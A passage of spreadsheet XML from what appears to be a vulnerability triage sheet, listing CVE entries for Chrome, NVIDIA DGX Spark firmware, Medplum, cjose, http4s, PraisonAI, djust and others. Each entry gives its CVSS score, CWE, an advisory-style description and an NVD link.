      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Storage in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87618</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87628</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>Use after free in Cast in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87628</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87639</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87639</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87644</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization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S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87644</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87648</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87648</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12855</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>8338d8cb-57f7-4252-abc0-96fd13e98d21</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>Unvalidated memory boundary could result in arbitrary code execution. The vulnerability exists in the code developed specifically for HP projects.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12855</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24262</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24262</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24263</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause a NULL pointer dereference. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24263</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44506</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. In Medplum versions 4.1.10 through 5.1.6, the /oauth2/register endpoint could return the client_secret of preconfigured OAuth clients defined via the defaultOAuthClients server configuration when a matching redirect_uri was provided. This issue has been patched in version 5.1.7.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44506</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47626</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47626</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53761</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>Frappe CRM is an open-source customer relationship management tool. Prior to version 1.73.0, there is an authentication bypass vulnerability via logged invitation keys in crm/api. This issue has been patched in version 1.73.0.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53761</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53938</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). Prior to version 0.6.2.5, cjose's JWE decryption path for the AES Key Wrap key-management algorithms (`alg` = `A128KW`, `A192KW`, `A256KW`) does not validate the length of the attacker-supplied `encrypted_key` (JWE Encrypted Key) before unwrapping it into a fixed-size, heap-allocated Content Encryption Key (CEK) buffer. A remote, unauthenticated attacker who can submit a crafted JWE to an application that decrypts it with an AES-KW symmetric key can trigger an out-of-bounds heap write, corrupting the heap. This leads at minimum to a crash (denial of service) and, depending on the heap layout and allocator, may be leverageable for further memory-corruption impact. `cjose_jwe_import()` / `cjose_jwe_decrypt()` are pre-authentication entry points: they parse and process fully attacker-controlled input. Upgrade to cjose 0.6.2.5 to receive a patch. If upgrading is not immediately possible, reject the AES Key Wrap algorithms (`A128KW`/`A192KW`/`A256KW`) for untrusted JWEs at the application layer.</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53938</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54556</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>Http4s is a Scala interface for HTTP services. Prior to 0.23.35 and 1.0.0-M47, an unauthenticated HTTP/2 peer can cause an out-of-memory denial of service in the Ember backend with HTTP/2 enabled. The Hpack wrapper in ember-core/shared/src/main/scala/org/http4s/ember/core/h2/Hpack.scala concatenates HEADERS and CONTINUATION frame fragments and decodes them into a single List, but maxHeaderSize accounting does not include indexed headers or HPACK per-header overhead. A small compressed header block can therefore expand into a much larger decoded representation that remains in memory for processing. Servers exposed to untrusted HTTP/2 traffic and clients directed to an untrusted HTTP/2 server are affected, and concurrent malicious connections can exhaust the process heap. This issue is fixed in versions 0.23.35 and 1.0.0-M47.</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54556</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55528</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, AgentServer exposes ServerConfig.auth_token but AgentServer._create_app does not check it on any route. A remote caller can subscribe, publish, and perform other actions without a valid bearer token or X-Auth-Token even when authentication is configured. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55528</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55533</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, create_auth_middleware() allows requests when auth=api-key lacks PRAISONAI_API_KEY or JWT authentication lacks PRAISONAI_JWT_SECRET. An externally bound Recipe server can therefore accept unauthenticated POST /v1/recipes/run requests despite authentication being enabled. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55533</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55571</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306</t>
        </is>
      </c>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to 1.0.4, LiveViewConsumer.handle_mount sends a `{"type":"navigate","to":...}` frame when login_required, permission_required, or a redirecting on_mount hook denies a LiveView mount, but returns without closing the WebSocket or clearing self.view_instance. A browser follows the redirect, but a raw WebSocket client can ignore it and retain the mounted socket. Because LiveViewConsumer.handle_event does not recheck authentication or authorization, the client can send `{"type":"event",...}` frames that invoke @event_handler methods without an authenticated session, including through handle_live_redirect_mount, enabling unauthorized sensitive reads or mutations. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55571</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63135</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R354" s="5" t="inlineStr">
        <is>
